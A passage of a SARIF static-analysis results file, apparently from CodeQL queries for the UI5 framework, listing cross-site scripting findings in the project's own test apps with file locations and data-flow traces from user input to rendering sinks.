id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":5,"startColumn":27,"endColumn":32}}}],"partialFingerprints":{"primaryLocationLineHash":"92dbc37bdafc7694:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}},"message":{"text":"jQuery. ... param\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":5,"startColumn":27,"endColumn":32}},"message":{"text":"value"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":12,"startColumn":27,"endColumn":32}}}],"partialFingerprints":{"primaryLocationLineHash":"faa1832c387d2ee5:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}},"message":{"text":"documen ... .search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":12,"startColumn":27,"endColumn":32}},"message":{"text":"value"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":20,"startColumn":27,"endColumn":33}}}],"partialFingerprints":{"primaryLocationLineHash":"8291f53a2e235d15:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}},"message":{"text":"documen ... .search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":18,"startColumn":39,"endColumn":44}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":18,"startColumn":18,"endColumn":45}},"message":{"text":"jQuery. ... (value)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":18,"startColumn":9,"endColumn":15}},"message":{"text":"value1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":20,"startColumn":27,"endColumn":33}},"message":{"text":"value1"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402},"region":{"startLine":132,"startColumn":7,"endLine":134,"endColumn":16}}}],"partialFingerprints":{"primaryLocationLineHash":"63ace7b071639814:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401},"region":{"startLine":23,"startColumn":25,"endColumn":48}},"message":{"text":"oSearch ... Value()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401},"region":{"startLine":23,"startColumn":11,"endColumn":22}},"message":{"text":"searchValue"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401},"region":{"startLine":27,"startColumn":34,"endColumn":45}},"message":{"text":"searchValue"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402},"region":{"startLine":17,"startColumn":13,"endColumn":31}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402},"region":{"startLine":133,"startColumn":8,"endColumn":27}},"message":{"text":"oControl.getTitle()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402},"region":{"startLine":132,"startColumn":7,"endLine":134,"endColumn":16}},"message":{"text":"\"<div>T ... </div>\""}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401},"region":{"startLine":23,"startColumn":25,"endColumn":48}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401},"region":{"startLine":23,"startColumn":25,"endColumn":48}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":425},"region":{"startLine":14,"startColumn":23,"endColumn":41}}}],"partialFingerprints":{"primaryLocationLineHash":"fc87b07640e9d85:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":430},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":426},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":425},"region":{"startLine":7,"startColumn":23,"endColumn":41}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":425},"region":{"startLine":14,"startColumn":23,"endColumn":41}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":430},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":430},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":434},"region":{"startLine":14,"startColumn":32,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"352d5eac262ae765:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":439},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":435},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":434},"region":{"startLine":7,"startColumn":23,"endColumn":41}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":434},"region":{"startLine":14,"startColumn":32,"endColumn":50}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":439},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":439},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":442},"region":{"startLine":14,"startColumn":28,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"352d5ec8b0c3bb0d:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":448},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":443},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":442},"region":{"startLine":7,"startColumn":19,"endColumn":37}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":442},"region":{"startLine":14,"startColumn":28,"endColumn":46}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":448},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":448},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":27,"startColumn":36,"endColumn":41}}}],"partialFingerprints":{"primaryLocationLineHash":"8ceecee7055f4fa2:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":26,"startColumn":25,"endColumn":42}},"message":{"text":"oInput.getValue()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":26,"startColumn":17,"endColumn":22}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":27,"startColumn":36,"endColumn":41}},"message":{"text":"value"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":26,"startColumn":25,"endColumn":42}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":26,"startColumn":25,"endColumn":42}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":32,"startColumn":30,"endColumn":43}}}],"partialFingerprints":{"primaryLocationLineHash":"2550a22178eb38c8:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":26,"startColumn":19,"endColumn":36}},"message":{"text":"oInput.getValue()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":26,"startColumn":11,"endColumn":16}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":27,"startColumn":56,"endColumn":61}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":27,"startColumn":45,"endColumn":63}},"message":{"text":"{ message: value }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":30,"startColumn":34,"endColumn":39}},"message":{"text":"model"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":32,"startColumn":30,"endColumn":35}},"message":{"text":"model"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":32,"startColumn":30,"endColumn":43}},"message":{"text":"model.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":26,"startColumn":19,"endColumn":36}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479},"region":{"startLine":26,"startColumn":19,"endColumn":36}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":32,"startColumn":30,"endColumn":43}}}],"partialFingerprints":{"primaryLocationLineHash":"2550a22178eb38c8:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":26,"startColumn":19,"endColumn":36}},"message":{"text":"oInput.getValue()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":26,"startColumn":11,"endColumn":16}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":27,"startColumn":56,"endColumn":61}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":27,"startColumn":45,"endColumn":63}},"message":{"text":"{ message: value }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":30,"startColumn":34,"endColumn":39}},"message":{"text":"model"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":32,"startColumn":30,"endColumn":35}},"message":{"text":"model"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":32,"startColumn":30,"endColumn":43}},"message":{"text":"model.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":26,"startColumn":19,"endColumn":36}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480},"region":{"startLine":26,"startColumn":19,"endColumn":36}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482},"region":{"startLine":26,"startColumn":30,"endColumn":43}}}],"partialFingerprints":{"primaryLocationLineHash":"2550a22178eb38c8:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481},"region":{"startLine":25,"startColumn":19,"endColumn":36}},"message":{"text":"oInput.getValue()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481},"region":{"startLine":25,"startColumn":11,"endColumn":16}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481},"region":{"startLine":26,"startColumn":56,"endColumn":61}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481},"region":{"startLine":26,"startColumn":45,"endColumn":63}},"message":{"text":"{ message: value }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482},"region":{"startLine":24,"startColumn":34,"endColumn":39}},"message":{"text":"model"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482},"region":{"startLine":26,"startColumn":30,"endColumn":35}},"message":{"text":"model"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482},"region":{"startLine":26,"startColumn":30,"endColumn":43}},"message":{"text":"model.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481},"region":{"startLine":25,"startColumn":19,"endColumn":36}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481},"region":{"startLine":25,"startColumn":19,"endColumn":36}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":538},"region":{"startLine":8,"startColumn":28,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"353ad97f4bff4eae:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":543},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":539},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: 